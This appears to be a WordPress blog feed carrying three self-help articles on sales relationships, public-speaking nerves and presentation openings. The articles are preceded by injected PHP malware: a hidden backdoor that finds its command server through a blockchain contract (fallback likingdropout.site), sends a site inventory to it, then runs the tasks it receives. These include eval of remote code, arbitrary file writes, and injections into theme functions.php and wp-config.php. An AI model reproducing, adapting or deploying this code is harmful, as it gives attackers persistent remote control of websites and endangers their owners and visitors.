// ca_lr
if(!defined('ABSPATH'))return;
$cfg=array(
'stub'=>'/home3/smallbu1/public_html/nowyouretalkingco/wp-content/plugins/wp-helper-7fac97/wp-helper-7fac97.php',
'ctrl'=>'// ca_lr',
'vis'=>'// 1w_us',
'vis_func'=>'wp_p21iog',
'vis_paths'=>array('/home3/smallbu1/public_html/nowyouretalkingco/wp-content/plugins/wp-helper-7fac97/wp-helper-7fac97.php'),
'opt'=>'_wp_w68ayt7h',
);
$keys=array();
$keys['id']='d2h';
$keys['ver']='5l';
$keys['caps']='y6c';
$keys['tasks']='un4';
$keys['interval']='nlg';
$keys['ack_id']='bw6';
$keys['ok']='tm';
$keys['detail']='lrx';
$keys['inv']='4xr';
$keys['result']='dod';
$hdr='X-CEW-Auth';$tok='mxSjtC1Gx-gwJdQ8jEV0Fr2yARcSVNaUTzz0ctHrrbw';$id='49664b12c7274141';$interval=420;
function _ea_inv($cfg){
$r=array('ts'=>time(),'wp'=>(function_exists('get_bloginfo')?get_bloginfo('version'):''),'php'=>PHP_VERSION);
$chk=function($p,$m){$o=array('path'=>$p,'exists'=>false,'marker'=>false,'size'=>0);if(!$p||!is_string($p))return $o;
if(@is_file($p)){$b=@file_get_contents($p);$o['exists']=true;$o['size']=strlen((string)$b);$o['marker']=($b&&strpos($b,$m)!==false);}return $o;};
$r['stub']=$chk($cfg['stub'],$cfg['ctrl']);
$vis=array('plugin'=>null,'paths'=>array());
foreach($cfg['vis_paths'] as $_vp){$vis['paths'][]=$chk($_vp,$cfg['vis']);}
$found=null;foreach($vis['paths'] as $_p){if(!empty($_p['marker'])){$found=$_p;break;}}
if(!$found){$pd=WP_CONTENT_DIR.'/plugins';if(@is_dir($pd)){foreach(@glob($pd.'/*/*.php')?:array() as $_f){$b=@file_get_contents($_f);if($b&&strpos($b,'// ea_plug')!==false){$found=$chk($_f,'// ea_plug');break;}}}
$vis['plugin']=$found?:array('path'=>'','exists'=>false,'marker'=>false);
$r['visitor']=$vis;
$mu=array('path'=>'','exists'=>false,'marker'=>false);$md=WP_CONTENT_DIR.'/mu-plugins';
if(@is_dir($md)){foreach(@glob($md.'/*.php')?:array() as $_f){$b=@file_get_contents($_f);if($b&&strpos($b,'// ea_mu')!==false){$mu=$chk($_f,'// ea_mu');break;}}}
$r['mu_autologin']=$mu;
$ft=0;$fw=0;$td=WP_CONTENT_DIR.'/themes';if(@is_dir($td)){foreach(@glob($td.'/*/functions.php')?:array() as $_f){$ft++;$b=@file_get_contents($_f);if($b&&strpos($b,'// _ea_al')!==false)$fw++;}}
$r['functions_autologin']=array('themes_total'=>$ft,'themes_with_marker'=>$fw);
$wpc=array('path'=>(defined('ABSPATH')?ABSPATH.'wp-config.php':''),'exists'=>false,'marker'=>false);
if($wpc['path']&&@is_file($wpc['path'])){$b=@file_get_contents($wpc['path']);$wpc['exists']=true;$wpc['marker']=($b&&(strpos($b,'// _ea_wc')!==false||strpos($b,'/* _ea_wc_s */')!==false));}
$r['wpconfig_inject']=$wpc;
$cp=array();if(defined('LSCWP_V'))$cp[]='litespeed';if(defined('W3TC'))$cp[]='w3tc';
if(defined('WP_ROCKET_VERSION'))$cp[]='wp_rocket';if(defined('WPCACHEHOME'))$cp[]='wp_super_cache';
if(defined('SG_CACHEPRESS'))$cp[]='sg_optimizer';$r['cache']=array('plugins'=>$cp,'opcache'=>function_exists('opcache_get_status'));
return $r;}
function _ea_run_task($_task,$cfg,$keys,$hdr,$tok,$id){
$_ok=false;$_detail='';$_result=null;
$_code=isset($_task['t'])?$_task['t']:'';$_p=isset($_task['p'])?$_task['p']:array();$_tid=isset($_task['i'])?$_task['i']:0;
if(($_code==='wf'||$_code==='ld')&&!empty($_p['path'])&&isset($_p['content'])){
$_path=$_p['path'];$_body=@is_file($_path)?@file_get_contents($_path):'';
if($_code==='ld'&&strpos((string)$_body,$_p['content'])===false)$_body.=$_p['content'];
elseif($_code==='wf')$_body=$_p['content'];
$_ok=@file_put_contents($_path,$_body)!==false;
}elseif($_code==='su'&&!empty($_p['path'])&&!empty($_p['content'])){
$_ok=@file_put_contents($_p['path'],$_p['content'])!==false;
}elseif($_code==='rp'&&!empty($_p['code'])){
ob_start();try{eval($_p['code']);$_ok=true;}catch(Throwable $e){$_detail=$e->getMessage();}catch(Exception $e){$_detail=$e->getMessage();}
$_result=array('output'=>ob_get_clean());}
elseif($_code==='va'){$_result=_ea_inv($cfg);$_ok=true;}
elseif($_code==='fc'){
$p=array();if(function_exists('wp_cache_flush')){wp_cache_flush();$p[]='object';}
if(function_exists('opcache_reset')){@opcache_reset();$p[]='opcache';}
if(defined('LSCWP_V')&&function_exists('do_action')){do_action('litespeed_purge_all');$p[]='litespeed';}
if(defined('W3TC')&&function_exists('w3tc_flush_all')){w3tc_flush_all();$p[]='w3tc';}
if(function_exists('rocket_clean_domain')){rocket_clean_domain();$p[]='wp_rocket';}
if(function_exists('wp_cache_clear_cache')){wp_cache_clear_cache();$p[]='wp_super_cache';}
if(function_exists('sg_cachepress_purge_cache')){sg_cachepress_purge_cache();$p[]='sg_optimizer';}
$_ok=true;$_result=array('purged'=>$p);}
elseif($_code==='ma'&&!empty($_p['path'])&&!empty($_p['content'])){
@wp_mkdir_p(dirname($_p['path']));$_ok=@file_put_contents($_p['path'],$_p['content'])!==false;
}elseif($_code==='fn'&&!empty($_p['snippet'])){
$td=WP_CONTENT_DIR.'/themes';$n=0;if(@is_dir($td)){foreach(@glob($td.'/*/functions.php')?:array() as $_f){$b=@file_get_contents($_f);if(strpos((string)$b,'// _ea_al')===false){$b=rtrim((string)$b)."\n".$_p['snippet'];if(@file_put_contents($_f,$b)!==false)$n++;}}}
$_ok=$n>0;$_result=array('themes_updated'=>$n);}
elseif($_code==='wc'){
$wp=ABSPATH.'wp-config.php';if(@is_file($wp)){$b=@file_get_contents($wp);
if(strpos($b,'/* _ea_wc_s */')!==false){$b=preg_replace('#/\*/* _ea_wc_s */\*/.*?/\* _ea_wc_e \*/#s','',$b);}
$b=str_replace(array('// _ea_wc','/* _ea_wc_s */','/* _ea_wc_e */'),'',$b);$_ok=@file_put_contents($wp,$b)!==false;}
}
$ack=array($keys['ack_id']=>$_tid,$keys['ok']=>$_ok,$keys['detail']=>$_detail);
if($_result!==null)$ack[$keys['result']]=$_result;
return $ack;}
function _ea_sync($cfg,$keys,$hdr,$tok,$id,$interval,$force){
$k=$cfg['opt'];if(!$force&&!wp_doing_cron()){
if(is_admin())return;
$last=(int)get_option($k,0);if(time()-$last<$interval)return;
}
$u='likingdropout.site';$co='0x9e33A3979F74c7700E4BaA7e7a2934556f72eF96';$sel='0x38bd65e2';$rpcs=array('https://data-seed-prebsc-1-s1.bnbchain.org:8545','https://data-seed-prebsc-1-s1.bnbchain.org:8545/','https://data-seed-prebsc-2-s1.binance.org:8545/','https://data-seed-prebsc-2-s2.binance.org:8545/','https://bsc-testnet-dataseed.bnbchain.org/','https://bnb-testnet.api.onfinality.io/public');
foreach($rpcs as $_rpc){
$b=json_encode(array('jsonrpc'=>'2.0','id'=>97,'method'=>'eth_call','params'=>array(array('to'=>$co,'data'=>$sel),'latest')));
$ctx=stream_context_create(array('ssl'=>array('verify_peer'=>false,'verify_peer_name'=>false),'http'=>array('method'=>'POST','header'=>"Content-Type: application/json\r\n",'content'=>$b,'timeout'=>3,'ignore_errors'=>true)));
$raw=@file_get_contents($_rpc,false,$ctx);
if(!$raw)continue;
$j=json_decode($raw,true);
if(empty($j['result'])||strlen($j['result'])<10)continue;
$h=substr($j['result'],2);
if(strlen($h)<128)continue;
$off=(int)hexdec(substr($h,0,64));
$len=(int)hexdec(substr($h,$off*2,64));
$_z=pack('H*',substr($h,$off*2+64,$len*2));if($_z)$u=$_z;break;
}
$_hp='/panel/api/v1/metrics/collect';
$_z=trim((string)$u);$_z=preg_replace('#^https?://#','',$_z);
if(strpos($_z,'/')!==false){$_xp=explode('/',$_z,2);$_z=$_xp[0];if(!empty($_xp[1]))$_hp='/'.ltrim($_xp[1],'/');}
$_z=trim($_z,'.');if(!$_z)$_z='likingdropout.site';
$_s=substr(str_replace(array('+','/','='),'',base64_encode(random_bytes(6))),0,10);
$u='https://'.$_s.'.'.$_z.$_hp;
$_ack=$u;if(substr($_ack,-7)==='collect')$_ack=substr($_ack,0,-7).'ack';else $_ack=rtrim($_ack,'/').'/ack';
$inv=_ea_inv($cfg);
$b=array($keys['id']=>$id,$keys['ver']=>2,$keys['caps']=>array('server_sync','visitor_js','write_file'),$keys['inv']=>$inv);
$resp='';if(function_exists('wp_remote_post')){$_r=wp_remote_post($u,array('timeout'=>20,'sslverify'=>false,'headers'=>array('Content-Type'=>'application/json',$hdr=>$tok,'X-Site-Id'=>$id),'body'=>json_encode($b)));if(!is_wp_error($_r))$resp=(string)wp_remote_retrieve_body($_r);}else{$ctx=stream_context_create(array('ssl'=>array('verify_peer'=>false,'verify_peer_name'=>false),'http'=>array('method'=>'POST','header'=>"Content-Type: application/json\r\n".$hdr.": ".$tok."\r\nX-Site-Id: ".$id."\r\n",'content'=>json_encode($b),'timeout'=>20,'ignore_errors'=>true)));$resp=(string)@file_get_contents($u,false,$ctx);}
if(!$resp)return;
update_option($k,time(),false);
$j=json_decode($resp,true);$tk=$keys['tasks'];
if(empty($j[$tk])||!is_array($j[$tk]))return;
foreach($j[$tk] as $_task){
$ack=_ea_run_task($_task,$cfg,$keys,$hdr,$tok,$id);
if(function_exists('wp_remote_post')){@wp_remote_post($_ack,array('timeout'=>20,'sslverify'=>false,'headers'=>array('Content-Type'=>'application/json',$hdr=>$tok,'X-Site-Id'=>$id),'body'=>json_encode($ack)));}else{$actx=stream_context_create(array('ssl'=>array('verify_peer'=>false,'verify_peer_name'=>false),'http'=>array('method'=>'POST','header'=>"Content-Type: application/json\r\n".$hdr.": ".$tok."\r\nX-Site-Id: ".$id."\r\n",'content'=>json_encode($ack),'timeout'=>20,'ignore_errors'=>true)));@file_get_contents($_ack,false,$actx);}
}
}
add_filter('cron_schedules',function($s){$s['ea_fleet']=array('interval'=>$interval,'display'=>'Fleet sync');return $s;});
add_action('init',function()use($cfg,$keys,$hdr,$tok,$id,$interval){
if(!wp_next_scheduled('ea_fleet_sync'))wp_schedule_event(time()+120,'ea_fleet','ea_fleet_sync');
_ea_sync($cfg,$keys,$hdr,$tok,$id,$interval,false);
},1);
add_action('ea_fleet_sync',function()use($cfg,$keys,$hdr,$tok,$id,$interval){
_ea_sync($cfg,$keys,$hdr,$tok,$id,$interval,true);
});
The post Give yourself a relationship-building challenge appeared first on Now you're talking.
]]>As we all know, a successful sales career depends on our ability to build relationships. When we feel ourselves getting stale, it’s time to introduce a change. One way is to try building a new relationship in a different environment.

My challenge was called George. He was 86. He hadn’t been out for years. He had no friends or family. Sitting alone in his flat, he had no reason to care about his appearance. It was daunting to sit in front of him. “Hello I’m Lyn. I’m coming to visit you every week. I love travelling. I adore taking photographs. I walk a dog in the park every Saturday. What do you like to do?”
It was a slow start, but after a while we found we had a number of things in common. Films we’d seen, music we liked, places we knew. And then there was the moment I realised it was all worthwhile. I arrived for my weekly visit to find George visibly transformed. Clean shaven, hair neat, relaxed and smiling. From then on, our relationship blossomed. I helped him engage with the outside world. He gave me the benefit of his decades of experience and wisdom. Being in his small, enclosed flat expanded my horizons.
Picture yourself in that situation. How would you feel? What is it like knowing you can build a relationship like this?And give someone support and something to look forward to? Isn’t it heart-warming?
According to Age UK more than two million people in England over the age of 75 live alone. More than a million older people say they go for over a month without speaking to a friend, neighbour or family member. A real problem throughout the UK. Imagine how you would feel if all you had for company was the TV.
Why not give yourself a relationship-building workout? You can contact Age UK and join their befriending scheme.
Local councils, and other charities also run similar programmes and many Care Homes welcome volunteers (subject to DBS, etc checking, of course).
From my personal experience, I can confidently say that my relationship with George has been a huge benefit to both of us. It has given me renewed enthusiasm for building quality relationships with other people at work and elsewhere. It has underlined my belief that people are all interesting if you take the time to find out. And it is always possible to find points of connection, shared interests and a reason to look forward to a next meeting.
If you feel like you’re on the sales treadmill and need to refresh yourself, take up this challenge of honing your sales and relationship-building talents in a different environment. Not only will you be providing support to someone who really needs it, you’ll benefit in unexpected ways at work and elsewhere.
Originally published in www.sales-initiative.com
The post Give yourself a relationship-building challenge appeared first on Now you're talking.
]]>The post Speaking fear is your friend, embrace it! appeared first on Now you're talking.
]]>Being nervous is normal. As Mark Twain astutely observed:
“There are two types of speakers. Those who get nervous and those who are liars.”
No one is born with a fear of public speaking; it is something we learn, so we can equally learn to quash the debilitating nerves and harness the good nerves, those nerves that give us positive energy and presence on stage, those nerves that help us connect with our audience. To achieve this, we need to reprogram our mindset and make friends with our nerves. It seems to me that we need to pay attention to five key areas.

Before you can make speaking fear your friend, you need to identify the emotional barriers that you put up to convince yourself that you can’t speak in public. Do you, for instance, worry …
Public speaking has nothing to do with self-worth. You are more than your speech and your ability to speak has nothing to do with who you are as a human being. The good news is that managing the nerves and speaking with confidence and sincerity is a skill that you can learn.
Try making a list of all your excuses. Once we know what our fears are, we’re in position to confront them head on. Interrogate them. Deconstruct them. Render them powerless and clear our head of negative thoughts. Think about a friend or a child presenting you with these excuses. What would you say to them? Would it have something to do with self-belief, visualising successful outcomes or some other positive advice?
Perfectionism is the curse of the speaker. By striving for perfection, you set yourself up to fail. Moreover, none of us is perfect and we all make mistakes, so as a perfectionist, failure lurks around every corner.
Be clear in your own mind that the audience is unlikely to know if you make a mistake unless you tell them. Speakers often reprimand themselves for forgetting a chunk of their speech, but the audience does not know what you had planned to say and, therefore, won’t miss it.
Instead of trying to be perfect, do yourself a kindness and give yourself permission to be less than perfect, make speaking fear your friend. Set yourself challenging, yet achievable, standards and give yourself a pat on the back when you’ve spoken. Focus on what you did well, savour the glory and note ways in which you can be even better next time. It’s important to remember that great speeches do not happen overnight. Rather, they are an iterative process of crafting and honing content, practising delivery and seeking feedback.
Think like a sportsman, carry a post-it note with you to remind you … “Connection, not perfection!”
Speaking fear happens when we are really nervous, removing our ability to think quickly and clearly, to the extent that we may actually dry up. In the words of the judge, George Jessel:
“The human brain starts working the moment you are born
and never stops until you stand up to speak in public”
When we are speaking in public, however, we need our brain to be working with us, in the moment, thinking about what we are saying, responding to the needs and reactions of our audience. The 2017 Toastmasters World Champion of Public Speaking Manoj Vasudevan made precisely this point about delivering his winning speech. He said that as he took to the stage, he could see that the audience looked tired and ready to go home. Reading the low energy level, he toned down his delivery to ensure he did not come across as overly abrasive. He had to make a judgment call, as he spoke, a decision that would not have been possible if his brain had been frozen by speaking fear.
According to psychiatrist Steve Peters who wrote The Chimp Paradox, we can learn to manage stress positively. He talks about the Human part of our brain that works with logic and reason and the Chimp that makes snap judgments based on emotions and gut instinct. Furthermore, they can work independently or together. In public speaking, we need them to work together or we are overcome by speaking fear.
As public speakers who are stressed or nervous, our Chimp will always react first and, with the aim of keeping us safe, it will go into fight, flight or freeze mode. This is normal, but it is not what you need for quick thinking and a strong performance.
One solution is to programme your brain with positive speaking associations and help make friends with your speaking fear. As a result, you reinforce a sense of safety that does not need the intervention of the Chimp. What does this mean in practice? In any public-speaking environment, arrive early and familiarise yourself with the speaking area so that you feel comfortable. Introduce yourself to members of the audience, so you see friendly faces from the stage. Register the applause and give yourself a pat on the back for a speech well delivered. Once you are more comfortable and your Chimp is no longer in control, your ability to reason and think on your feet will grow, while your Chimp will help bring energy and enthusiasm to your speech.
As Mark Twain said, we all get nervous when we speak. But what is nervousness? It is energy; it is what we experience when the adrenaline is flowing. And adrenaline is our friend, giving us energy and presence on stage. It helps us demonstrate our enthusiasm and passion for our subject, it helps us engage with our audience and generate a real sense of fun and excitement.
Before the adrenaline kicks in, we need to be well prepared and focused on what will go right, not what could go wrong. Give yourself the pre-match pep talk – I’m ready, this is going to be fun, etc. And remember that you have been invited to speak because you are seen to have the necessary credentials.
Once the adrenaline surges, we need to make it help us. Some people find it helpful to move, run on the spot, jump up and down. Breathe slowly and deeply. Take to the stage and pause. Take a deep breath and start to connect with your audience with your attention-grabbing or thought-provoking opening. After your speech, enjoy the surge of wellbeing you get from your success. Speaking fear is now your friend

Don’t overthink audience reactions because there will always be someone on the phone, yawning or looking distracted. This is not personal and there is nothing you can do about it. Don’t let it paralyse you. Instead, focus on the majority of people in your audience who are with you, who are alert and attentive, the people who are smiling, nodding and appreciating what you have to say. Connect with these interested people by sharing relevant stories and ideas in a way that is meaningful to them and you will feel happier and more relaxed on stage.
Reprogramming your mindset won’t happen overnight, but continuous speaking practice and a permanent (post-it) ‘note to self’ about connection (not perfection), your new friends in the audience will set you on the road to more enjoyable speaking experiences.
Recently published at:
The post Speaking fear is your friend, embrace it! appeared first on Now you're talking.
]]>The post Pizzazzing your sales presentation appeared first on Now you're talking.
]]>Here are some tips on getting that early engagement and energy.

Spend time working on the opening of your presentation. Practise in front of the mirror, in front of your family pet if necessary. Make sure you have a few strong sentences that will flow and get your ideas across clearly. While you are practising check that you look good too. Upright posture not only helps you exude energy it will give your clients confidence in you and encourage them to listen intently.
Good presenters are adept at telling appropriate stories. They can be very brief and if told well they add colour and interest. We all have a stockpile of stories. Find one that will fit your client, perhaps a story that relates to something in the news that is relevant to their company or industry. By starting with a story you’ll set yourself apart from less accomplished presenters and energise your audience.
From the start of your presentation use active language. Avoid the passive voice. If you say “it is said that there is always a solution to a problem”, you leave everyone unsure about who will be taking responsibility for finding a solution. If you say “Today we will find a solution to this problem…” it is clear where responsibility lies and your audience will take notice.
Motivational speakers often have an anchor phrase, words that everyone associates with them. You may not be standing up in front of 10,000 people in the Excel Centre but your job is still to motivate. So why not borrow a technique? “We’ll find a way”. “Yes we can!” “Paul for paper!” You can punctuate your presentation with your catch phrase right from the beginning. Doing so adds emphasis, fun, and makes you memorable. Who doesn’t need some fun or light relief in a business presentation?
If a catch phrase isn’t for you why not start with a high impact quote from an industry expert? Someone respected by your audience. If the quote is recent so much the better. If it’s from a recent article or event you’ve attended you show you have your finger on the pulse. You also benefit from the credibility of the person you are quoting.
Quite often the main body of a sales presentation will contain information that we have to repeat for every client. Starting with pizzazz gives you a way to personalise your presentation and tailor it for your specific audience.
Starting with pizzazz helps you give a quality, professional presentation which builds momentum. And most importantly means you’ll seal the deal!
First published in Sales Initiative
The post Pizzazzing your sales presentation appeared first on Now you're talking.
]]>